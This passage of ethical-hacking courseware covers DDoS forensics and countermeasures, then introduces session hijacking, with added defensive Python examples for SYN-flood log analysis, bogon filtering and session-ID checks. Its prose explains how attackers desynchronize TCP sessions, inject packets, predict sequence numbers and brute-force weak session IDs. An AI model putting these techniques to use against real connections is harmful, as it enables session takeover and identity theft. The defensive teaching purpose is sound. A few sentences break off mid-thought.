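    expected = _tag(server_secret, puzzle["client"], puzzle["issued"],
                    puzzle["nonce"], puzzle["difficulty"])
    if not hmac.compare_digest(expected, puzzle["tag"]):
        return False
    digest = hashlib.sha256(
        "{}|{}|{}".format(puzzle["nonce"], puzzle["tag"], solution).encode()).digest()
    return _leading_zero_bits(digest) >= puzzle["difficulty"]


if __name__ == "__main__":
    secret = b"constructed-server-secret"
    puzzle = issue_puzzle(secret, "203.0.113.7", difficulty_for_load(0.8))
    answer = solve_puzzle(puzzle)
    print("difficulty", puzzle["difficulty"], "solution", answer,
          "accepted", verify_solution(secret, puzzle, answer))
```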
Post-Attack Forensics

Traffic Pattern Analysis

During a DDoS attack, the traffic pattern tool stores post-attack data, which users analyze to identify characteristics unique to the attacking traffic. These data are helpful in updating load balancing and throttling countermeasures to enhance their efficiency and protection ability. Moreover, DDoS attack traffic patterns can help network administrators develop new filtering techniques to prevent DDoS attack traffic from entering or leaving their networks. Analyzing DDoS traffic patterns can also help network administrators ensure that an attacker cannot use their servers as a DDoS platform to break into other sites.
Zombie Zapper Tool

When a company is unable to ensure the security of its servers and a DDoS attack starts, the network IDS notices the high volume of traffic, which indicates a potential problem. The targeted victim can run Zombie Zapper to stop packets from flooding the system. There are two versions of Zombie Zapper: one runs on UNIX, while the other runs on Windows. Currently, this tool acts as a defense mechanism against Trinoo, Tribe Flood Network (TFN), Shaft, and Stacheldraht.
Packet Traceback

Packet traceback refers to tracing back attack traffic. It is similar to reverse engineering. In this method, the targeted victim works backward by tracing the packet to its source. Once the victim identifies the true source, they can take steps to block further attacks from that source by developing the necessary preventive techniques. In addition, packet traceback can assist in gaining knowledge of the various tools and techniques that an attacker uses. This information can help in developing and implementing different filtering techniques to block attacks.
Event Log Analysis

DDoS event logs assist in forensic investigation and the enforcement of laws, which are helpful when an attacker causes severe financial damage. Providers can use honeypots and other network security mechanisms such as firewalls, packet sniffers, and server logs to store all the events that occurred during the setup and execution of the attack. This allows network administrators to recognize the type of DDoS attack or the combination of attacks used. Routers, firewalls, and IDS logs can be analyzed to identify the source of the DoS traffic. Further, network administrators can attempt to trace back the attacker's IP address with the help of intermediary ISPs and law enforcement agencies.
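Traffic pattern analysis and event log analysis in practice, as an added example that is not part of the courseware: firewall log lines are parsed and grouped per destination and time window, and a window is flagged when it holds many SYNs from sources that never complete a handshake, the pattern that separates a spoofed SYN flood from a legitimate traffic peak. The log format, the thresholds and every address below are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Added example (not from the courseware): traffic pattern / event log analysis
# over constructed firewall log lines. Log format, thresholds and addresses are
# assumptions; adapt the regex to the appliance whose logs you actually hold.

LOG_LINE = re.compile(
    r"^(?P<ts>\S+) fw: SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=(?P<proto>\S+) "
    r"SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+) FLAGS=(?P<flags>\S+)$")
EPOCH = datetime(1970, 1, 1)


def parse_log(lines):
    """Turn matching lines into dicts; lines in another format are skipped."""
    events = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(rec)
    return events


def syn_flood_profile(events, window_seconds=10, syn_threshold=50, max_completion=0.2):
    """Group SYNs per destination and time window. A window is flagged when it
    holds many SYNs and almost none of the sources ever complete the handshake
    (a spoofed SYN flood) rather than a busy but legitimate peak."""
    syns = defaultdict(list)    # (dst, window) -> source IPs that sent a SYN
    acked = defaultdict(set)    # (dst, window) -> sources that later sent a plain ACK
    for ev in events:
        if ev["proto"] != "TCP":
            continue
        window = int((ev["ts"] - EPOCH).total_seconds() // window_seconds)
        key = (ev["dst"], window)
        if ev["flags"] == "S":
            syns[key].append(ev["src"])
        elif "A" in ev["flags"] and "S" not in ev["flags"]:
            acked[key].add(ev["src"])
    findings = []
    for key, sources in syns.items():
        distinct = set(sources)
        completed = distinct & acked[key]
        ratio = len(completed) / len(distinct)
        if len(sources) >= syn_threshold and ratio <= max_completion:
            start = EPOCH + timedelta(seconds=key[1] * window_seconds)
            findings.append({
                "dst": key[0],
                "window_start": start.isoformat(),
                "syn_count": len(sources),
                "distinct_sources": len(distinct),
                "completion_ratio": round(ratio, 3),
                # candidates for an ACL review or an ISP block request
                "unanswered_sources": sorted(distinct - completed),
            })
    return findings


def constructed_sample_log():
    """Constructed log: 3 legitimate clients completing handshakes plus 60
    one-packet SYN sources, the shape of a spoofed SYN flood."""
    fmt = ("2020-05-05T10:00:{:02d}Z fw: SRC={} DST=203.0.113.10 PROTO=TCP "
           "SPT={} DPT=80 FLAGS={}")
    lines = []
    for i, src in enumerate(("198.51.100.21", "198.51.100.22", "198.51.100.23")):
        lines.append(fmt.format(1, src, 40000 + i, "S"))
        lines.append(fmt.format(2, src, 40000 + i, "A"))
    for i in range(60):
        lines.append(fmt.format(3 + i % 5, "192.0.2.{}".format(i + 1), 1024 + i, "S"))
    return lines


if __name__ == "__main__":
    for finding in syn_flood_profile(parse_log(constructed_sample_log())):
        print(finding["dst"], finding["window_start"], finding["syn_count"],
              "SYNs from", finding["distinct_sources"], "sources; completion",
              finding["completion_ratio"])
```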
Techniques to Defend against Botnets

There are four techniques to defend against botnets:

RFC 3704 Filtering

RFC 3704 is a basic access-control list (ACL) filter, which limits the impact of DDoS attacks by blocking traffic with spoofed addresses. This filter requires packets sourced from valid, allocated address space that is consistent with the topology and space allocation. A "bogon list" consists of all unused or reserved IP addresses that should not come from the Internet. If a packet is sourced from any of the IP addresses from the bogon list, then the packet is from a spoofed source IP, and the filter should drop it. System administrators should check whether the ISP performs RFC 3704 filtering in the cloud before traffic enters the system. Because the bogon list changes regularly, in case the ISP does not perform RFC 3704 filtering, the system administrator must manage their own bogon ACL rules or switch to another ISP.
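An RFC 3704-style ingress filter, as an added example that is neither the courseware's nor the RFC's own code: packets arriving on the Internet-facing interface are dropped when their source is in a bogon block or claims the organization's own address space. The bogon list is a constructed snapshot of well-known reserved IPv4 blocks and the address ranges are assumptions; a real list must be refreshed regularly.

```python
import ipaddress

# Added example: simplified RFC 3704 ingress filtering. The bogon list is a
# constructed snapshot of reserved IPv4 blocks and will go stale; refresh it
# from the ISP or a bogon feed. The RFC 5737 documentation ranges
# (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) are deliberately left out
# so they can stand in for "our" and "the Internet's" addresses in this example.
BOGON_PREFIXES = [ipaddress.ip_network(p) for p in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.168.0.0/16",
    "198.18.0.0/15", "224.0.0.0/4", "240.0.0.0/4",
)]


def ingress_decision(src_ip, internal_prefixes, bogons=BOGON_PREFIXES):
    """Decide for one packet arriving on the external interface.
    internal_prefixes: CIDR strings of the address space behind the filter.
    Returns ("drop", reason) or ("permit", None)."""
    try:
        addr = ipaddress.ip_address(src_ip)
    except ValueError:
        return "drop", "unparseable source"
    internal = [ipaddress.ip_network(p) for p in internal_prefixes]
    # A packet from the Internet must never claim one of our own addresses:
    # that is the spoofed-source pattern this filter exists to stop.
    if any(addr in net for net in internal):
        return "drop", "spoofed internal source"
    if any(addr in net for net in bogons):
        return "drop", "bogon source"
    return "permit", None


def apply_acl(packets, internal_prefixes, bogons=BOGON_PREFIXES):
    """Run the ACL over (src, dst) pairs; return permitted pairs and drop counts per reason."""
    permitted, drops = [], {}
    for src, dst in packets:
        verdict, reason = ingress_decision(src, internal_prefixes, bogons)
        if verdict == "permit":
            permitted.append((src, dst))
        else:
            drops[reason] = drops.get(reason, 0) + 1
    return permitted, drops


def acl_lines(internal_prefixes, bogons=BOGON_PREFIXES):
    """Render the same policy as a deny/permit list an administrator can compare
    against the router's ACL; the syntax is illustrative, not vendor-exact."""
    lines = ["deny ip {} any  ! spoofed internal".format(p) for p in internal_prefixes]
    lines += ["deny ip {} any  ! bogon".format(net) for net in bogons]
    lines.append("permit ip any any")
    return lines


if __name__ == "__main__":
    ours = ["203.0.113.0/24"]                      # constructed: our allocated block
    sample = [("198.51.100.77", "203.0.113.10"),   # legitimate Internet client
              ("10.0.0.5", "203.0.113.10"),        # RFC 1918 source: bogon
              ("203.0.113.9", "203.0.113.10"),     # claims our own space: spoofed
              ("224.0.0.251", "203.0.113.10")]     # multicast source: bogon
    print(apply_acl(sample, ours))
    print("\n".join(acl_lines(ours)))
```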
Cisco IPS Source IP Reputation Filtering

Reputation services help in determining whether an IP or service is a source of threat. Cisco Global Correlation, a new security capability of Cisco IPS 7.0, uses immense security intelligence. The Cisco SensorBase Network contains information about all known threats on the Internet, such as botnets, malware outbreaks, darknets, and botnet harvesters. The Cisco IPS makes use of this network to filter DoS traffic before it damages critical assets. To detect and prevent malicious activity even earlier, it incorporates global threat data into its system.
Black Hole Filtering

Black-hole filtering is a common technique to defend against botnets and, thus, to prevent DoS attacks. Black holes refer to network nodes wherein incoming traffic is discarded or dropped without informing the source that the data did not reach the intended recipient. Undesirable traffic can be dropped before it enters a protected network with a technique called remotely triggered black-hole (RTBH) filtering. As this is a remotely triggered process, this filtering must be performed in conjunction with the ISP. It uses Border Gateway Protocol (BGP) host routes to route traffic to the victim's servers to a "null0" next hop.
DDoS Prevention Offerings from ISP or DDoS Service

This method is effective in preventing IP spoofing at the ISP level. Here, the ISP scrubs/cleans traffic before allowing it to enter a user's Internet link. Because this service runs in the cloud, DDoS attacks do not saturate the Internet links. In addition, some third parties offer cloud DDoS prevention services. IP Source Guard (in Cisco) or similar features can be enabled in other routers to filter traffic based on the DHCP snooping binding database or IP source bindings, which prevent bots from sending spoofed packets.
Additional DoS/DDoS Countermeasures

Implementing defensive mechanisms at proper places by following proper measures allows the heightening of organizational network security. The following is a list of countermeasures for combating DoS/DDoS attacks:

▪ Use strong encryption mechanisms such as WPA and AES 256 for broadband networks to defend against eavesdropping
▪ Ensure that the software and protocols are up-to-date and scan the machines thoroughly to detect any anomalous behavior
▪ Update the kernel to the latest release and disable unused and insecure services
▪ Block all inbound packets originating from the service ports to block the traffic from reflection servers
▪ Enable TCP SYN cookie protection
▪ Prevent the transmission of fraudulently addressed packets at the ISP level
▪ Implement cognitive radios in the physical layer to handle jamming and scrambling attacks
▪ Configure the firewall to deny external ICMP traffic access
▪ Secure remote administration and connectivity testing
▪ Perform thorough input validation
▪ Stop data processed by the attacker from being executed
▪ Prevent the use of unnecessary functions such as gets and strcpy
▪ Prevent the return addresses from being overwritten
DoS/DDoS Protection at ISP Level

One of the best ways to defend against DoS attacks is to block them at the gateway. This task is performed by the contracted ISP. ISPs offer a "clean pipes" service-level agreement that provides an assured bandwidth of genuine traffic, rather than the total bandwidth of all traffic. Most ISPs simply block all requests during a DDoS attack, denying even legitimate traffic from accessing the service. If an ISP does not provide clean-pipes services, subscription services provided by many cloud service providers can be used. The subscription services serve as an intermediary, receive traffic destined for the network, filter it, and then pass on only trusted connections. Vendors such as Imperva and Verisign offer services for cloud protection against DoS attacks.

ISPs offer in-the-cloud DDoS protection for Internet links to avoid saturation due to an attack. This type of protection redirects attack traffic to the ISP during an attack. Administrators can request ISPs to block the original affected IP and move their site to another IP after performing DNS propagation.
Figure 10.34: DoS/DDoS protection at the ISP level
Enabling TCP Intercept on Cisco IOS Software

Source: https://www.cisco.com

TCP intercept can be enabled by executing the commands given in the below table in the global configuration mode.

Step 1
Command: access-list access-list-number {deny | permit} tcp any destination destination-wildcard
Purpose: Defines an IP extended access list

Step 2
Command: ip tcp intercept list access-list-number
Purpose: Enables TCP intercept

Table 10.1: Steps to enable TCP intercept on Cisco IOS
An access list achieves three purposes:

1. Interception of all requests
2. Interception of only requests originating from specific networks
3. Interception of only requests destined for specific servers
Typically, an access list defines the source as any source and the destination as specific networks or servers. As it is unimportant to know who to intercept packets from, the source addresses are not filtered. Rather, the destination server or network to be protected is identified. TCP intercept can operate in either the active intercept mode or passive watch mode. The default is the intercept mode.

In the active intercept mode, the Cisco IOS software actively intercepts all inbound connection requests (SYN) and replies with a SYN-ACK on behalf of the server, following which it waits for an acknowledge (ACK) from the client. On receiving the ACK from the client, the software sends the original SYN to the server and completes a three-way handshake with the server. Once the three-way handshake is complete, the two half connections are linked.

In the passive watch mode, the user sends connection requests that pass through the server, but they need to wait until the connection is established. If connection requests fail to establish within 30 s, the software sends a reset request to the server to clear its state.
The below table presents the command to set the TCP intercept mode in the global configuration mode.

Command: ip tcp intercept mode {intercept | watch}
Purpose: Sets the TCP intercept mode

Table 10.2: Command to set the TCP intercept mode in the global configuration mode
Module Flow

DoS/DDoS Protection Tools

This section discusses various hardware and software DoS/DDoS protection tools such as FortiDDoS, DDoS Protector, Imperva Incapsula, and Anti DDoS Guardian that are effective in safeguarding networks from DoS/DDoS attacks.
Advanced DDoS Protection Appliances

The following are examples for appliances that provide advanced protection against DDoS attacks.

▪ FortiDDoS 1200B

Source: https://www.fortinet.com

FortiDDoS provides comprehensive protection against DDoS attacks. It helps protect Internet infrastructure from threats and service disruptions by surgically removing network and application layer DDoS attacks while letting legitimate traffic flow without being impacted.

▪ DDoS Protector

Source: https://www.checkpoint.com

Check Point DDoS Protector blocks DDoS attacks with multi-layered protection. Its advantages are listed as follows:

o Blocks a wide range of attacks with customized multi-layered protection
o Behavioral protection base-lining multiple elements and blocking abnormal traffic
o Automatically generated and predefined signatures
o Use of advanced challenge/response techniques
o Fast response time to protect against attacks within seconds
o Automatically defends against network flood and application layer attacks
o Customized protection optimized to meet the security needs of a specific network environment
o Quickly filters traffic before it reaches the firewall to protect networks and servers as well as block exploits
o Flexible deployment options to protect any business
o Integrated with Check Point Security Management

Figure 10.36: DDoS Protector
▪ Terabit DDoS Protection System

Source: https://terabitsecurity.com

Terabit DDoS Protection System (DPS) is a solution for the detection and subsequent treatment of DDoS attacks. Terabit DPS helps ensure the maximum availability of a network and eliminates any disruptions caused by DoS/DDoS attacks. It can be used for large networks of bandwidth up to 1 Tbps. It can also provide protection for bandwidth up to 6.4 Tbps.

Figure 10.37: Terabit DPS appliance
▪ A10 Thunder TPS

Source: https://www.a10networks.com

A10 Thunder Threat Protection System (TPS) ensures reliable access to key network services by detecting and blocking external threats such as DDoS and other cyber-attacks before they escalate into costly service outages. Its features are listed as follows:

o Custom protection with immediate blocking
o Proactive DDoS detection and mitigation
o Combined on-premises and cloud-based DDoS protection
o Built-in SSL inspection to block encrypted traffic
o Inbound reputation-based DDoS protection
o Inbound and outbound advanced threat protection

Figure 10.38: A10 Thunder TPS
DoS/DDoS Protection Tools

▪ Imperva Incapsula DDoS Protection

Source: https://www.incapsula.com

Imperva Incapsula DDoS protection quickly mitigates any size attack without disrupting legitimate traffic or increasing latency. It is designed to provide multiple DDoS protection options and supports unicast and anycast technologies to power a many-to-many defense methodology. It automatically detects and mitigates attacks exploiting application and server vulnerabilities, hit-and-run events, and large botnets. Incapsula proxies all web requests to block DDoS attacks from being relayed to client origin servers. Incapsula detects and mitigates any type of attack, including TCP SYN+ACK, TCP FIN, TCP RESET, TCP ACK, TCP ACK+PSH, TCP fragmentation, UDP, Slowloris, spoofing, ICMP, IGMP, HTTP flood, brute force, connection flood, DNS flood, NXDomain, mixed SYN+UDP or ICMP+UDP flood, ping of death, reflected ICMP & UDP, and Smurf.
Figure 10.39: Screenshot of Incapsula DDoS protection tool
The following are examples for additional DDoS protection tools:

▪ Anti DDoS Guardian (http://www.beethink.com)
▪ DOSarrest's DDoS protection service (https://www.dosarrest.com)
▪ DDOS-GUARD (https://ddos-guard.net)
▪ Cloudflare (https://www.cloudflare.com)
▪ F5 (https://f5.com)
DoS/DDoS Protection Services

▪ Akamai DDoS Protection

Source: https://www.akamai.com

Akamai provides DDoS protection for enterprises regularly targeted by DDoS attacks. Akamai Kona Site Defender delivers multi-layered defense that effectively protects websites and web applications against the increasing threat, sophistication, and scale of DDoS attacks.

Kona Site Defender provides unmatched web and application protection, which is delivered through an intelligent platform with more than 210,000 servers over 120 countries. Network-layer DDoS traffic is deflected and application layer DDoS traffic is absorbed in the network edge, while mitigation capabilities are implemented natively in-path, protecting against application layer attacks in the cloud before they reach the client origin. Kona Site Defender has a highly scalable web application firewall (WAF) offering protection against application layer attacks in HTTP and HTTPS traffic, providing a complete DDoS protection solution for enterprises to maintain web performance and availability.
Figure 10.40: Akamai DDoS protection service
The following are examples for additional DDoS protection services:

▪ Kaspersky DDoS Protection Tool (https://www.kaspersky.com)
▪ Stormwall PRO (https://stormwall.pro)
▪ Corero Network Security (https://www.corero.com)
▪ Nexusguard (https://www.nexusguard.com)
▪ BlockDoS (https://www.blockdos.net)
Module Summary

In this module, we discussed concepts related to denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks. We also discussed various types of DoS/DDoS attacks. Additionally, this module discussed concepts related to botnets along with the botnet ecosystem. Further, a detailed case study of a DDoS attack on GitHub was presented. Moreover, this module illustrated various DoS/DDoS attack tools and concluded with a detailed discussion on various countermeasures to prevent DoS/DDoS attacks, along with various hardware and software DoS/DDoS protection tools.

In the next module, we will discuss in detail how attackers, as well as ethical hackers and pen-testers, perform session hijacking to steal a valid session ID.
Module 11: Session Hijacking
Module Objectives

Session hijacking allows attackers to take over an active session by bypassing the authentication process. Thereafter, they can perform any action on the hijacked system.

This module aims to provide comprehensive information on session hijacking. It starts with an introduction to session hijacking concepts and provides insight into session hijacking at the application and network levels. Later, the module discusses tools used to hijack a session between a client and server. It also discusses various countermeasures to defend against session hijacking attacks.

At the end of this module, you will be able to do the following:

▪ Describe session hijacking concepts
▪ Perform application level session hijacking
▪ Perform network level session hijacking
▪ Use different session hijacking tools
▪ Apply session hijacking countermeasures
Module Flow

Session Hijacking Concepts
Familiarization with basic concepts related to session hijacking is important to attain a comprehensive understanding. This section explains what session hijacking is as well as the reasons why session hijacking succeeds. It also discusses the session hijacking process, packet analysis of a local session hijack, types of session hijacking, session hijacking in an Open Systems Interconnection (OSI) model, and differences between spoofing and hijacking.
What is Session Hijacking?

A web server sends a session identification token or key to a web client after successful authentication. These session tokens differentiate multiple sessions that the server establishes with clients. Web servers use various mechanisms to generate random tokens and controls to secure the tokens during transmission.

Session hijacking is an attack in which an attacker takes over a valid Transmission Control Protocol (TCP) communication session between two computers. Because most types of authentication are performed only at the start of a TCP session, an attacker can gain access to a machine while a session is in progress. Attackers can sniff all the traffic from established TCP sessions and perform identity theft, information theft, fraud, etc.

A session hijacking attack exploits a session-token generation mechanism or token security controls so that the attacker can establish an unauthorized connection with a target server. The attacker can guess or steal a valid session ID, which identifies authenticated users, and use it to establish a session with the server. The web server responds to the attacker's requests under the impression that it is communicating with an authenticated user.

Attackers can use session hijacking to launch various kinds of attacks, such as man-in-the-middle (MITM) and denial-of-service (DoS) attacks. In an MITM attack, an attacker places themselves between an authorized client and a server by performing session hijacking to ensure that information flowing in either direction passes through them. However, the client and server believe they are directly communicating with each other. Attackers can also sniff sensitive information and disrupt sessions to launch a DoS attack.
Figure 11.1: Example of session hijacking
Why is Session Hijacking Successful?

Session hijacking succeeds because of the following factors.

▪ Absence of account lockout for invalid session IDs: If a website does not implement account lockout, an attacker can make several attempts to connect with varying session IDs embedded in a genuine URL. The attacker can continue making attempts until the actual session ID is determined. This attack is also known as a brute-force attack. During a brute-force attack, the web server does not display a warning message or complaint, allowing the attacker to determine the valid session ID.

▪ Weak session-ID generation algorithm or small session IDs: Most websites use linear algorithms to predict variables such as time or IP address for generating session IDs. By studying the sequential pattern and generating multiple requests, an attacker can easily narrow the search space necessary to forge a valid session ID. Even if a strong session-ID generation algorithm is used, an active session ID can be easily determined if the string is short.
Attackers can also perform session hijacking if they can break into a proxy server, which potentially logs or caches session IDs.

▪ Most computers using TCP/Internet Protocol (IP) are vulnerable: All machines running TCP/IP are vulnerable to session hijacking because of the design flaws inherent in TCP/IP.

▪ Most countermeasures do not work without encryption: It is easy to sniff session IDs in a flat network if transport security is not set up properly during the transmission of session ID cookies, even if a web application uses Secure Sockets Layer (SSL) encryption. An attacker's task becomes even easier if they capture session IDs containing actual login information.
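The first two factors above (no lockout for invalid session IDs, and weak or short session IDs) from the defender's side, as an added example that is not part of the courseware: a constructed time-plus-counter session-ID scheme beside a CSPRNG-based one, a check that estimates how guessable a set of issued IDs is, and a lockout counter that cuts off clients presenting repeated invalid IDs. The entropy threshold, prefix-ratio threshold and lockout budget are assumptions.

```python
import math
import secrets
import time

# Added example (not from the courseware): weak vs strong session IDs, a
# predictability check over a sample of issued IDs, and a lockout counter for
# repeated invalid session IDs. Thresholds below are assumptions.


def weak_session_id(counter, now=None):
    """Constructed weak scheme: epoch seconds plus a per-second counter, in hex.
    Knowing roughly when the victim logged in shrinks the search space to a
    few thousand candidates."""
    ts = int(now if now is not None else time.time())
    return "{:08x}{:04x}".format(ts, counter)


def strong_session_id():
    """256 bits from a CSPRNG, base64url-encoded; not guessable in practice."""
    return secrets.token_urlsafe(32)


def estimated_entropy_bits(session_id):
    """Upper bound on unpredictability from length and the alphabet actually used."""
    alphabet = set(session_id)
    return len(session_id) * math.log2(len(alphabet)) if alphabet else 0.0


def shared_prefix_ratio(ids):
    """Average fraction of leading characters that adjacent (sorted) IDs share.
    Sequential or time-based IDs score high; random IDs score near zero."""
    ordered = sorted(ids)
    if len(ordered) < 2:
        return 0.0
    total = 0.0
    for a, b in zip(ordered, ordered[1:]):
        common = 0
        for x, y in zip(a, b):
            if x != y:
                break
            common += 1
        total += common / max(len(a), len(b))
    return total / (len(ordered) - 1)


def is_predictable(ids, min_bits=128, max_prefix_ratio=0.5):
    """Flag an ID scheme as weak when IDs are short or visibly sequential."""
    return (min(estimated_entropy_bits(i) for i in ids) < min_bits
            or shared_prefix_ratio(ids) > max_prefix_ratio)


class InvalidSessionLockout:
    """Counts invalid session-ID presentations per client and locks the client
    out once it exceeds the budget inside the window, so that guessing IDs one
    by one is cut off instead of silently allowed."""

    def __init__(self, max_attempts=5, window_seconds=60):
        self.max_attempts = max_attempts
        self.window = window_seconds
        self._attempts = {}  # client -> timestamps of recent invalid attempts

    def _recent(self, client, now):
        return [t for t in self._attempts.get(client, []) if now - t < self.window]

    def record_invalid(self, client, now):
        """Register one invalid session ID; returns True when the client is now locked."""
        recent = self._recent(client, now)
        recent.append(now)
        self._attempts[client] = recent
        return len(recent) >= self.max_attempts

    def is_locked(self, client, now):
        return len(self._recent(client, now)) >= self.max_attempts


if __name__ == "__main__":
    weak = [weak_session_id(i) for i in range(20)]
    strong = [strong_session_id() for _ in range(20)]
    print("weak predictable:", is_predictable(weak), "prefix ratio", round(shared_prefix_ratio(weak), 2))
    print("strong predictable:", is_predictable(strong), "prefix ratio", round(shared_prefix_ratio(strong), 2))
```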
Session Hijacking Process

It is easier for an attacker to sneak into a system as a genuine user than to enter a system directly. An attacker can hijack a genuine user's session by finding an established session and taking it over after user authentication. After hijacking the session, the attacker can stay connected for hours without arousing suspicion. During this period, all traffic intended for the user's IP address goes to the attacker's system instead, and the attacker can plant backdoors or gain additional access to the system. Here, we examine how an attacker hijacks a session.
Figure 11.2: Session hijacking process
Session hijacking can be divided into three broad phases.

▪ Tracking the connection

The attacker uses a network sniffer to track a victim and host or uses a tool such as Nmap to scan the network for a target with a TCP sequence that is easy to predict. After identifying a victim, the attacker captures the sequence and acknowledgment numbers of the victim because TCP checks these numbers. The attacker then uses these numbers to construct packets.

▪ Desynchronizing the connection

A desynchronized state occurs when a connection between a target and host is established, or stable with no data transmission, or the server's sequence number is not equal to the client's acknowledgment number, or vice versa.
with both the server and target attempting to verify the correct sequence. Because these packets carry no data, retransmission does not occur if the packet is lost. However, because TCP uses IP, the loss of a single packet ends the unwanted conversation between the server and target.

An attacker can add a desynchronizing stage to the hijack sequence to deceive the target host. Without desynchronizing, the attacker injects data into the server while keeping their identity hidden by spoofing an IP address. However, the attacker should ensure that the server responds to the target host as well.

▪ Injecting the attacker's packet

Once the attacker has interrupted the connection between the server and target, they can either inject data into the network or actively participate as the man in the middle, passing data from the target to the server and vice-versa while reading and injecting data at will.
Packet Analysis of a Local Session Hijack
Session hijacking involves high-level attack vectors, which affect many systems. TCP is used for transmitting data by many systems that establish LAN or Internet connections. For establishing a connection between two systems and for the successful transmission of data, the two systems should perform a three-way handshake. Session hijacking involves the exploitation of this three-way handshake method to take control over the session.

To conduct a session hijacking attack, the attacker performs three activities:

▪ Tracking of a session
▪ Desynchronization of the session
▪ Injection of commands during the session

By sniffing network traffic, an attacker can monitor or track a session. The next step in session hijacking is to desynchronize the session. It is easy to accomplish this attack if the attacker knows the next sequence number (NSN) used by the client. A session can be hijacked by using that sequence number before the client uses it. There are two possibilities to determine sequence numbers: one is to sniff the traffic, find an ACK packet, and then determine the NSN based on the ACK packet. The other is to transmit data with guessed sequence numbers, which is not a reliable method. If the attacker can access the network and sniff the TCP session, they can easily determine the sequence number. This type of session hijacking is called "local session hijacking."
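The next-sequence-number arithmetic described above, used from the defender's side as an added example that is not part of the courseware: a small audit over a captured TCP stream tracks the expected NSN per direction and reports segments that do not continue the stream, which is how a monitor notices that someone else consumed the client's next sequence number before the client did. The segments, addresses and the `Segment` record type are constructed for this example.

```python
from collections import namedtuple

# Added example (not from the courseware): NSN tracking over a constructed TCP
# capture. A real tool would read the segments from a pcap; here they are
# built inline so the example runs offline.

Segment = namedtuple("Segment", "src dst seq ack flags payload_len")


def next_sequence_number(seg):
    """NSN = seq + payload bytes, plus one for SYN and one for FIN (each occupies
    a sequence number), modulo 2**32."""
    consumed = seg.payload_len + ("S" in seg.flags) + ("F" in seg.flags)
    return (seg.seq + consumed) % (1 << 32)


def audit_stream(segments):
    """Track the expected NSN per direction and return (index, kind, expected,
    observed) for every segment that does not continue the stream:
    'retransmission' when seq is behind the expected value (a duplicate, or in a
    hijack the real client reusing a number someone else already consumed) and
    'out-of-sequence' when seq jumps ahead."""
    expected = {}   # (src, dst) -> expected next sequence number
    findings = []
    for i, seg in enumerate(segments):
        key = (seg.src, seg.dst)
        exp = expected.get(key)
        if exp is not None and seg.seq != exp:
            behind = (exp - seg.seq) % (1 << 32) < (1 << 31)
            kind = "retransmission" if behind else "out-of-sequence"
            findings.append((i, kind, exp, seg.seq))
            continue   # a stray segment must not move the expected NSN
        expected[key] = next_sequence_number(seg)
    return findings


def constructed_capture():
    """Handshake, two data segments, then a segment that consumes the client's
    NSN 1021 before the client does, followed by the client's own next segment."""
    c, s = "198.51.100.5", "203.0.113.10"   # constructed client and server
    return [
        Segment(c, s, 1000, 0, "S", 0),          # client SYN
        Segment(s, c, 5000, 1001, "SA", 0),      # server SYN-ACK
        Segment(c, s, 1001, 5001, "A", 0),       # client ACK: handshake complete
        Segment(c, s, 1001, 5001, "PA", 20),     # client sends 20 bytes
        Segment(s, c, 5001, 1021, "PA", 100),    # server replies with 100 bytes
        Segment(c, s, 1021, 5101, "PA", 40),     # segment using the client's NSN 1021
        Segment(c, s, 1021, 5101, "PA", 30),     # the real client's next segment collides
    ]


if __name__ == "__main__":
    for index, kind, expected, observed in audit_stream(constructed_capture()):
        print("segment", index, kind, "expected seq", expected, "saw", observed)
```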
The below figure shows the packet analysis of a local session hijack.

Figure 11.3: Packet analysis of a local session hijack

According to the above figure, the next expected
Types of Session Hijacking
Session hijacking can be either active or passive, depending on the degree of involvement of the attacker. The essential difference between an active and passive hijack is that while an active hijack takes over an existing session, a passive hijack monitors an ongoing session.

▪ Passive Session Hijacking

In a passive attack, after hijacking a session, an attacker only observes and records all the traffic during the session. A passive attack uses sniffers on the network, allowing attackers to obtain information such as user IDs and passwords. The attacker can later use this information to log in as a valid user and enjoy the user's privileges. Password sniffing is the simplest password
Session Hijacking in OSI Model

- Network Level Hijacking: Network level hijacking can be defined as the interception of packets during the transmission between a client and the server in a TCP or UDP session.
- Application Level Hijacking: Application level hijacking refers to gaining control over the HTTP's user session by obtaining the session IDs.
There are two levels of session hijacking in the OSI model: the network level and the application level.

- Network Level Hijacking

Network level hijacking is the interception of packets during the transmission between a client and server in a TCP/User Datagram Protocol (UDP) session. A successful attack provides the attacker with crucial information, which can be further used to attack application level sessions. Attackers most likely perform network level hijacking because they do not need to modify the attack on a per-web-application basis. This attack focuses on the data flow of the protocol shared across all web applications.

- Application Level Hijacking

Application level hijacking involves gaining control over the Hypertext Transfer Protocol (HTTP) user session by obtaining the session IDs. At the application level, the attacker gains control of an existing session and can create new unauthorized sessions by using stolen data. In general, both occur together, depending on the system being attacked.
Spoofing vs. Hijacking

- Spoofing Attack: An attacker pretends to be another user or machine (victim) to gain access. The attacker does not take over an existing active session; instead, he or she initiates a new session using the victim's stolen credentials.
- Hijacking: Session hijacking is the process of seizing control of an existing active session. The attacker relies on the legitimate user to make a connection and authenticate.
In blind hijacking, an attacker predicts the sequence numbers that a victim host sends to create a connection that appears to originate from the host, or a blind spoof. To understand blind hijacking, it is important to understand sequence-number prediction. TCP sequence numbers, which are unique per byte in a TCP session, provide flow control and data integrity. TCP segments provide the initial sequence number (ISN) as a part of each segment header. ISNs do not start at zero for each session. As part of the handshake process, each participant needs to state the ISN, and bytes are numbered sequentially from that point.

Blind session hijacking relies on the attacker's ability to predict or guess sequence numbers. An attacker is unable to spoof a trusted host on a different network and observe the reply packets because no route exists for the packets to return to the attacker's IP address. Moreover, the attacker is unable to resort to Address Resolution Protocol (ARP) cache poisoning because routers do not broadcast ARP across the Internet. Because the attacker is unable to observe the replies, they must anticipate the responses from the victim and prevent the host from sending a TCP/RST packet to the victim. The attacker predicts sequence numbers that the remote host expects from the victim and then hijacks the communication. This method is useful to exploit the trust relationships between users and remote machines.

